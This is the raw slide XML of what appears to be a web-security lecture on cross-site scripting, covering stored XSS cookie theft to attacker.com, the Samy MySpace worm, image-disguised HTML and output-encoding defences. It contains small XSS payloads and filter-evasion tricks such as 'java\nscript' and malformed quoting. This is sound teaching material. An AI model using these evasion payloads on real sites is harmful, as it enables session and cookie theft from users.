              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/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   The message is stored in the guestbook database and displayed  (executed!) for every new client of the guestbook.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pP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eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3100" dirty="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Consequence: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2700" dirty="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Many victims’ cookies stolen by attacker.com;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2700" dirty="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Possible sensitive private information;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:ea typeface="宋体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977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MySpace.com   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>(Samy worm)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6246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22937" y="1686631"/>
            <a:ext cx="9642951" cy="5818876"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3100"/>
              <a:t>Users can post HTML on their pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700"/>
              <a:t>MySpace.com ensures HTML contains no</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;, &lt;body&gt;, onclick, &lt;a href=javascript://&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700"/>
              <a:t>…  but can do Javascript within CSS tags:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Times"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;div style=“background:url(‘javascript:alert(1)’)”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Times"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700"/>
              <a:t>And can hide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700"/>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>java\nscript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="90000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3100"/>
              <a:t>With careful javascript hacking:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700"/>
              <a:t>Samy worm infects anyone who visits an infected MySpace page   …    and adds Samy as a friend.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700"/>
              <a:t>Samy had millions of friends within 24 hours.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6344047" y="7157639"/>
            <a:ext cx="3438177" cy="35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370" tIns="50685" rIns="101370" bIns="50685">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="90000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://namb.la/popular/tech.html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2727324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Let</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>’s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r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>!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775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Notable XSS exploits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Yahoo Mail (2013)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Microsoft (2013)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Google </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>+1 button (2012)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Facebook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (2012,2011,2010)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Stored XSS using images</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26627" name="Rounded Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2706793" y="2951604"/>
            <a:ext cx="5244412" cy="21082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lIns="101370" tIns="50685" rIns="101370" bIns="50685"/>
          <a:lstStyle/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26628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45873" y="1855294"/>
            <a:ext cx="9135428" cy="5144224"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="380139" lvl="1" indent="-380139">
              <a:buClr>
                <a:schemeClr val="hlink"/>
              </a:buClr>
              <a:buSzPct val="110000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700"/>
              <a:t>Suppose   pic.jpg   on web server contains HTML !</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="823634" lvl="2" indent="-380139">
              <a:spcBef>
                <a:spcPts val="1995"/>
              </a:spcBef>
              <a:buSzPct val="110000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t> request for    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://site.com/pic.jpg    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>results in:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="823634" lvl="2" indent="-380139">
              <a:lnSpc>
                <a:spcPts val="2217"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1995"/>
              </a:spcBef>
              <a:buSzPct val="110000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>			      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP/1.1  200 OK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="823634" lvl="2" indent="-380139">
              <a:lnSpc>
                <a:spcPts val="2217"/>
              </a:lnSpc>
              <a:buSzPct val="110000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>			      …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="823634" lvl="2" indent="-380139">
              <a:lnSpc>
                <a:spcPts val="2217"/>
              </a:lnSpc>
              <a:buSzPct val="110000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>			      Content-Type:  image/jpeg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="823634" lvl="2" indent="-380139">
              <a:lnSpc>
                <a:spcPts val="2217"/>
              </a:lnSpc>
              <a:buSzPct val="110000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="823634" lvl="2" indent="-380139">
              <a:lnSpc>
                <a:spcPts val="2217"/>
              </a:lnSpc>
              <a:buSzPct val="110000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>			      &lt;html&gt;  fooled ya   &lt;/html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="823634" lvl="2" indent="-380139">
              <a:spcBef>
                <a:spcPts val="2661"/>
              </a:spcBef>
              <a:buSzPct val="110000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>IE will render this as HTML    (despite Content-Type)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="380139" lvl="1" indent="-380139">
              <a:spcBef>
                <a:spcPts val="4434"/>
              </a:spcBef>
              <a:buSzPct val="110000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700"/>
              <a:t>Consider photo sharing sites that support image uploads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="823634" lvl="2" indent="-380139">
              <a:spcBef>
                <a:spcPts val="1109"/>
              </a:spcBef>
              <a:buSzPct val="110000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>What if attacker uploads an “image” that is a script?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="823634" lvl="2" indent="-380139">
              <a:buSzPct val="110000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3100"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2687571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data validation and filtering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31747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Never trust client-side data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Best: allow only what you expect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Remove/encode special characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Many encodings, special chars!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1262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Output filtering / encoding</a:t>
            </a:r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Remove / encode (X)HTML special chars</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>; for &lt;, &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>; for &gt;, &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>quot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> for “ …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Allow only safe commands (e.g., no &lt;script&gt;…)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Caution: `filter evasion` tricks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>See XSS Cheat Sheet for filter evasion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>E.g., if filter allows quoting (of &lt;script&gt; etc.), use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/>
              <a:t>    malformed quoting: &lt;IMG “””&gt;&lt;SCRIPT&gt;alert(“XSS”)…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Or: (long) UTF-8 encode, or…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Caution: Scripts not only in &lt;script&gt;!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="ZoneTexte 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-549293" y="5549755"/>
            <a:ext cx="204720" cy="379359"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="101370" tIns="50685" rIns="101370" bIns="50685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9217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60000"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="1080580" algn="l"/>
                <a:tab pos="3547963" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PHP:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(string)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="1080580" algn="l"/>
                <a:tab pos="3547963" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  		&amp; 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 &amp;amp;	" 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&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>quot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>;      '  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&amp;#039;       	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="1080580" algn="l"/>
                <a:tab pos="3547963" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		&lt;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>;	&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="100000"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="1080580" algn="l"/>
                <a:tab pos="3547963" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>htmlspecialchars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	     "&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>='test'&gt;Test&lt;/a&gt;",   ENT_QUOTES); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="1080580" algn="l"/>
                <a:tab pos="3547963" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Outputs:  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lt;a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=&amp;#039;test&amp;#039;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gt;Test&amp;lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>a&amp;gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="1080580" algn="l"/>
                <a:tab pos="3547963" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ASP.NET 1.1:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="60000"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="1080580" algn="l"/>
                <a:tab pos="3547963" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Server.HtmlEncode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(string) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPct val="60000"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="1080580" algn="l"/>
                <a:tab pos="3547963" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Similar to PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>htmlspecialchars</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="1080580" algn="l"/>
                <a:tab pos="3547963" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="1080580" algn="l"/>
                <a:tab pos="3547963" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="409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encoding functions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40965" name="TextBox 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2886542" y="6962623"/>
            <a:ext cx="4246654" cy="37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370" tIns="50685" rIns="101370" bIns="50685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See http://us3.php.net/htmlspecialchars</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2329604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Existing Server-side Prevention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398965" y="2530475"/>
            <a:ext cx="1522413" cy="9271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01362" tIns="50681" rIns="101362" bIns="50681" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Escaping Filtering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Flowchart: Document 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4584700" y="1265240"/>
            <a:ext cx="1149350" cy="674687"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartDocumen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62" tIns="50681" rIns="101362" bIns="50681" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:defRPr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Vulnerable code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4584700" y="4048125"/>
            <a:ext cx="1149350" cy="674688"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartDocumen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62" tIns="50681" rIns="101362" bIns="50681" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"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Patched</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"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code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538414" y="5481638"/>
            <a:ext cx="1522413" cy="9271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01362" tIns="50681" rIns="101362" bIns="50681" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Taint</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Analysis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483102" y="5481638"/>
            <a:ext cx="1522413" cy="9271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01362" tIns="50681" rIns="101362" bIns="50681" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>String Analysis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597652" y="5397500"/>
            <a:ext cx="2114550" cy="9271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01362" tIns="50681" rIns="101362" bIns="50681" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Instruction Randomization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Cloud 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7764463" y="758827"/>
            <a:ext cx="2724150" cy="1604963"/>
          </a:xfrm>
          <a:prstGeom prst="clou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62" tIns="50681" rIns="101362" bIns="50681" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
